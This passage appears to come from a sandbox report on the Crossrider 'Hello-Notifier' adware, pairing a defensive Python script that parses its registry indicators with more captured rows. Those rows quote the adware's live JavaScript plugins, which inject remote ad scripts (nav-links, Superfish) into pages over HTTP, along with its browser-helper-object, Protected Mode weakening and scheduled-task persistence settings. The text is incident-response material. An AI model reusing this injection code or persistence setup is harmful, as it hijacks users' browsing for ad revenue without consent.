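| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Isolation = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\39\Url = "http://app-static.crossrider.com/plugins/mins/ie/IEDatabase.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\123\JavaScript = "if (!appAPI.dom.isHttps()) { appAPI.dom.addRemoteJS(\"http://intext.nav-links.com/js/intext.js?afid=crossrider&subid=\" + appAPI.internal.monetization.getSubId() + \"&maxlinks=8&linkcolor=#0000FF\"); }" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-updater.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
"""

ROW_RE = re.compile(r"^\|\s*(?P<desc>[^|]*?)\s*\|\s*(?P<indicator>.*?)\s*\|\s*"
                    r"(?P<process>[^|]*?)\s*\|\s*(?P<target>[^|]*?)\s*\|$")
SETVALUE_RE = re.compile(r'^(?P<path>.*?) = "(?P<value>.*)"$')

def parse_rows(text):
    """Split table rows; for 'Set value' rows also split the indicator into path and value."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m or m["desc"] == "Description":
            continue
        row = m.groupdict()
        sv = SETVALUE_RE.match(row["indicator"]) if row["desc"].startswith("Set value") else None
        row["path"] = sv["path"] if sv else None
        # the report doubles backslashes inside quoted values; undo that
        row["value"] = sv["value"].replace("\\\\", "\\") if sv else None
        rows.append(row)
    return rows

# Meaning of the Policy DWORD under Low Rights\ElevationPolicy (IE Protected Mode).
ELEVATION_POLICY = {0: "prompt, then launch at low integrity", 1: "launch silently at low integrity",
                    2: "prompt, then launch at medium integrity", 3: "launch silently at medium integrity"}
EP_RE = re.compile(r"\\ElevationPolicy\\\{(?P<guid>[0-9A-Fa-f-]+)\}\\(?P<field>AppName|AppPath|Policy)$")

def elevation_policies(rows):
    """Merge AppName/AppPath/Policy per GUID across HKLM, HKCU and WOW6432Node."""
    out = {}
    for row in rows:
        m = EP_RE.search(row["path"] or "")
        if not m:
            continue
        e = out.setdefault(m["guid"].lower(), {"name": None, "path": None, "policy": None, "meaning": None})
        if m["field"] == "Policy":
            e["policy"] = int(row["value"])
            e["meaning"] = ELEVATION_POLICY.get(e["policy"], "unknown")
        else:
            e["name" if m["field"] == "AppName" else "path"] = row["value"]
    return out

INPROC_RE = re.compile(r"\\CLSID\\\{(?P<clsid>[0-9A-Fa-f-]+)\}\\InprocServer32\\$")
BHO_RE = re.compile(r"\\Browser Helper Objects\\\{(?P<clsid>[0-9A-Fa-f-]+)\}\\NoExplorer$")

def bho_registrations(rows):
    """CLSID -> in-proc DLL; NoExplorer=1 keeps the BHO out of Windows Explorer (IE only)."""
    out = {}
    for row in rows:
        path = row["path"] or ""
        m = INPROC_RE.search(path)
        if m:
            out.setdefault(m["clsid"].lower(), {"dll": None, "no_explorer": False})["dll"] = row["value"]
        m = BHO_RE.search(path)
        if m:
            out.setdefault(m["clsid"].lower(), {"dll": None, "no_explorer": False})["no_explorer"] = row["value"] == "1"
    return out

def enhanced_protected_mode_disabled(rows):
    # Internet Explorer\Main\Isolation: "PMEM" = Enhanced Protected Mode, "PMIL" = legacy
    # Protected Mode, which a 32-bit in-process BHO needs in order to be loaded at all.
    return any((row["path"] or "").endswith(r"\Internet Explorer\Main\Isolation") and row["value"] == "PMIL"
               for row in rows)

HTTP_URL_RE = re.compile(r'http://[^\s"\\]+')

def plain_http_urls(rows):
    """Script URLs fetched over cleartext HTTP: anything on-path can substitute the code."""
    found = set()
    for row in rows:
        found.update(HTTP_URL_RE.findall(row["value"] or ""))
    return sorted(found)

def scheduled_jobs(rows):
    """Legacy Task Scheduler .job files dropped in the Windows Tasks folder (persistence)."""
    prefix = "C:\\Windows\\Tasks\\"
    return sorted(row["indicator"][len(prefix):] for row in rows
                  if row["desc"] == "File created" and row["indicator"].startswith(prefix)
                  and row["indicator"].lower().endswith(".job"))

if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for guid, e in elevation_policies(rows).items():
        print(f"ElevationPolicy {guid}: {e['name']} ({e['path']}) -> {e['policy']}: {e['meaning']}")
    for clsid, b in bho_registrations(rows).items():
        print(f"BHO {clsid}: {b['dll']} NoExplorer={b['no_explorer']}")
    print("EPM disabled:", enhanced_protected_mode_disabled(rows), "| http URLs:", plain_http_urls(rows),
          "| jobs:", scheduled_jobs(rows))
```

Run it against the full table text of a report and the ElevationPolicy output gives you the list of brokers Internet Explorer will start at medium integrity without a prompt, the BHO output gives the CLSID-to-DLL pairs to remove (both the native and the WOW6432Node Classes hive, as regsvr32 was run from system32 and SysWOW64 here), and the URL list is what to block or pivot on; the .job names are the persistence to delete alongside the Program Files (x86)\Hello-Notifier directory.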
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\123\JavaScript = "\n//------------------ PLUGIN intext_adv_m START ------------------\nif (typeof appAPI.internal.monetization === \"undefined\") { appAPI.internal.monetization = {}; }\nif (typeof appAPI.internal.monetization.plugins === \"undefined\") { appAPI.internal.monetization.plugins = {}; }\n\nappAPI.internal.monetization.plugins[123] = function() {\n\n if (!appAPI.internal.monetization.shouldRunByVertical(123, [\"intext\"])){\n return;\n }\n\n\t// boris don't want it on youtube for shop helper\n\tif (appAPI.appID == 33256 && appAPI.dom.location.href.indexOf(\"youtube.com\") !== -1) {\n\t\treturn;\n\t}\n\n\tif (!appAPI.dom.isHttps()) {\n\t\tappAPI.dom.addRemoteJS(\"http://intext.nav-links.com/js/intext.js?afid=crossrider&subid=\" + appAPI.internal.monetization.getSubId() + \"&maxlinks=8&linkcolor=#0000FF\");\n\t}\n};\n//------------------ PLUGIN intext_adv_m END ------------------\n" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\4\Version = "4" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\207 | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\183\Name = "tabsWrapper" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\39\Url = "http://app-static.crossrider.com/plugins/mins/ie/IEDatabase.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\38\Name = "IECallbacks" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\13\Url = "http://app-static.crossrider.com/plugins/mins/CrossriderAppUtils.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Crossrider | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer\Params = "{\n \"source_id\" : \"000249\",\n \"sub_id\" : \"0\",\n \"uzid\" : \"0\"\n}\n" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\43\Version = "5" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\102\Version = "5" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\64\Url = "http://app-static.crossrider.com/plugins/mins/appApiMessage.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\42\Version = "9" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\7\Name = "hooks" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\PopupPluginList = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\UpdateInterval = "360" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\17 | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\ | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\CurVer\ = "CrossriderApp0037928.Sandbox" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\7\JavaScript = "\n//------------------ PLUGIN hooks START ------------------\nappAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};\n//------------------ PLUGIN hooks END ------------------\n" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\CurVer\ = "CrossriderApp0037928.Sandbox" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer\FullVersionForUrl = "1_34_1_29" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer\SrcId = "000249" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\Manifest = "NA" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\183\Url = "http://app-static.crossrider.com/plugins/mins/tabsWrapper.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\125\Url = "http://app-static.crossrider.com/plugins/javascripts/monetization/geo/arcadi2_m.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Programmable | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{55555555-5555-5555-5555-550355795528}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\104 | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\93\JavaScript = "\n//------------------ PLUGIN superfish_no_coupons_m START ------------------\nif(typeof appAPI.internal.monetization===\"undefined\"){appAPI.internal.monetization={};}if(typeof appAPI.internal.monetization.plugins===\"undefined\"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[93]=function(){if(typeof appAPI.internal.monetization.verticals!==\"undefined\"){if(!appAPI.internal.monetization.verticals.shopping){return;}}try{if(!appAPI.dom.isHttps()){appAPI.dom.addRemoteJS({url:\"http://www.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=\"+appAPI.internal.monetization.getSubId()});}}catch(a){throw new Error(\"something_went_wrong_in_superfish_\"+a.message);}};\n//------------------ PLUGIN superfish_no_coupons_m END ------------------\n" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\93\Url = "http://app-static.crossrider.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\14\JavaScript = "\n//------------------ PLUGIN CrossriderUtils START ------------------\nif(typeof(appAPI)===\"undefined\"){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==\"undefined\"&&typeof window.navigator!==\"undefined\"&&typeof window.navigator.userAgent!==\"undefined\"){CR__bIsIEWindow=/MSIE (\\d+\\.\\d+);/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==\"undefined\"));appAPI.JSON={};if(typeof JSON!==\"undefined\"&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?\"0\"+n:n;}if(typeof Date.prototype.to_CR_JSON!==\"function\"){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear()+\"-\"+f(this.getUTCMonth()+1)+\"-\"+f(this.getUTCDate())+\"T\"+f(this.getUTCHours())+\":\"+f(this.getUTCMinutes())+\":\"+f(this.getUTCSeconds())+\"Z\":null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\\u0000\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,escapable=/[\\\\\\\"\\x00-\\x1f\\x7f-\\x9f\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,gap,indent,meta={\"\\b\":\"\\\\b\",\"\\t\":\"\\\\t\",\"\\n\":\"\\\\n\",\"\\f\":\"\\\\f\",\"\\r\":\"\\\\r\",'\"':'\\\\\"',\"\\\\\":\"\\\\\\\\\"},rep;function quote(string){escapable.lastIndex=0;return escapable.test(string)?'\"'+string.replace(escapable,function(a){var c=meta[a];return typeof c===\"string\"?c:\"\\\\u\"+(\"0000\"+a.charCodeAt(0).toString(16)).slice(-4);})+'\"':'\"'+string+'\"';}function str(key,holder){var i,k,v,length,mind=gap,partial,value=holder[key];if(value&&typeof value===\"object\"&&typeof value.to_CR_JSON===\"function\"){value=value.to_CR_JSON(key);}if(typeof rep===\"function\"){value=rep.call(holder,key,value);}switch(typeof value){case\"string\":return quote(value);case\"number\":return isFinite(value)?String(value):\"null\";case\"boolean\":case\"null\":return String(value);case\"object\":if(!value){return\"null\";}gap+=indent;partial=[];if(Object.prototype.toString.apply(value)===\"[object Array]\"){length=value.length;for(i=0;i<length;i+=1){partial[i]=str(i,value)||\"null\";}v=partial.length===0?\"[]\":gap?\"[\\n\"+gap+partial.join(\",\\n\"+gap)+\"\\n\"+mind+\"]\":\"[\"+partial.join(\",\")+\"]\";gap=mind;return v;}if(rep&&typeof rep===\"object\"){length=rep.length;for(i=0;i<length;i+=1){k=rep[i];if(typeof k===\"string\"){v=str(k,value);if(v){partial.push(quote(k)+(gap?\": \":\":\")+v);}}}}else{for(k in value){if(Object.prototype.hasOwnProperty.call(value,k)){v=str(k,value);if(v){partial.push(quote(k)+(gap?\": \":\":\")+v);}}}}v=partial.length===0?\"{}\":gap?\"{\\n\"+gap+partial.join(\",\\n\"+gap)+\"\\n\"+mind+\"}\":\"{\"+partial.join(\",\")+\"}\";gap=mind;return v;}}if(typeof appAPI.JSON.stringify!==\"function\"){appAPI.JSON.stringify=function(value,replacer,space){var i;gap=\"\";indent=\"\";if(typeof space===\"number\"){for(i=0;i<space;i+=1){indent+=\" \";}}else{if(typeof space===\"string\"){indent=space;}}rep=replacer;if(replacer&&typeof replacer!==\"function\"&&(typeof replacer!==\"object\"||typeof replacer.length!==\"number\")){throw new Error(\"appAPI.JSON.stringify\");}return str(\"\",{\"\":value});};}if(typeof appAPI.JSON.parse!==\"function\"){appAPI.JSON.parse=function(text,reviver){var j;function walk(holder,key){var k,v,value=holder[key];if(value&&typeof value===\"object\"){for(k in value){if(Object.prototype.hasOwnProperty.call(value,k)){v=walk(value,k);if(v!==undefined){value[k]=v;}else{delete value[k];}}}}return reviver.call(holder,key,value);}text=String(text);cx.lastIndex=0;if(cx.test(text)){text=text.replace(cx,function(a){return\"\\\\u\"+(\"0000\"+a.charCodeAt(0).toString(16)).slice(-4);});}if(/^[\\],:{}\\s]*$/.test(text.replace(/\\\\(?:[\"\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g,\"@\").replace(/\"[^\"\\\\\\n\\r]*\"|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g,\"]\").replace(/(?:^|:|,)(?:\\s*\\[)+/g,\"\"))){j=eval(\"(\"+text+\")\");return typeof reviver===\"function\"?walk({\"\":j},\"\"):j;}throw new SyntaxError(\"appAPI.JSON.parse\");};}}());}(function(a){a.debug=function(h,f){if(!a.isDebugMode()){return;}var b=!a.debug.settings.console;if(f!==null){b=f;}try{if(!b){var g=new Date();var i=(((a.debug.settings.timestamp)&&(typeof(h)==\"string\"))?(g.toLocaleTimeString()+\".\"+g.getMilliseconds()+\": \"+h):h);console.log(i);}else{alert(h);}}catch(c){alert(h);}};a.debug.settings={console:true,timestamp:true};})(appAPI);(function(a){if(typeof a.installer===\"undefined\"){a.installer={};}a.installer.getParams=function(){if(appAPI.internal&&appAPI.internal.installer&&appAPI.internal.installer.installerParams&&appAPI.internal.installer.installerParams.source_id&&appAPI.internal.installer.installerParams.source_id!==\"__SOURCE_ID__\"&&appAPI.internal.installer.installerParams.sub_id&&appAPI.internal.installer.installerParams.sub_id!==\"__SUB_ID__\"&&appAPI.internal.installer.installerParams.uzid&&appAPI.internal.installer.installerParams.uzid!==\"__UZID__\"){return appAPI.internal.installer.installerParams;}return(a.db.get(\"InstallerParams\")||{});};a.installer.getUnixTime=function(){return(a.db.get(\"InstallationTime\")||null);};a.installer.getIsFirstInstall=function(){if(!appAPI.internal||!appAPI.internal.installer||!appAPI.internal.installer.isFirstInstall){return true;}else{return appAPI.internal.installer.isFirstInstall===\"__FIRST_INSTALL__\";}};a.installer.getInstallerVersion=function(){var c=\"0\";var b=appAPI.internal.db.get(\"__installer_version__\");if(appAPI.internal&&appAPI.internal.installer&&appAPI.internal.installer.version&&appAPI.internal.installer.version!==\"__INSTALLER_VERSION__\"){c=appAPI.internal.installer.version;appAPI.internal.db.set(\"__installer_version__\",appAPI.internal.installer.version);}if(b){c=b;}return c;};})(appAPI);(function(b){b.time={};b.time.now=function(){return a(0);};b.time.secondsFromNow=function(c){return a(c*1000);};b.time.secondsAgo=function(c){return a(c*-1000);};b.time.minutesFromNow=function(c){return a(c*60*1000);};b.time.minutesAgo=function(c){return a(c*60*-1000);};b.time.hoursFromNow=function(c){return a(c*3600*1000);};b.time.hoursAgo=function(c){return a(c*3600*-1000);};b.time.daysFromNow=function(c){return a(c*3600*24*1000);};b.time.daysAgo=function(c){return a(c*3600*24*-1000);};b.time.yearsFromNow=function(c){return a(c*365*3600*24*1000);};b.time.yearsAgo=function(c){return 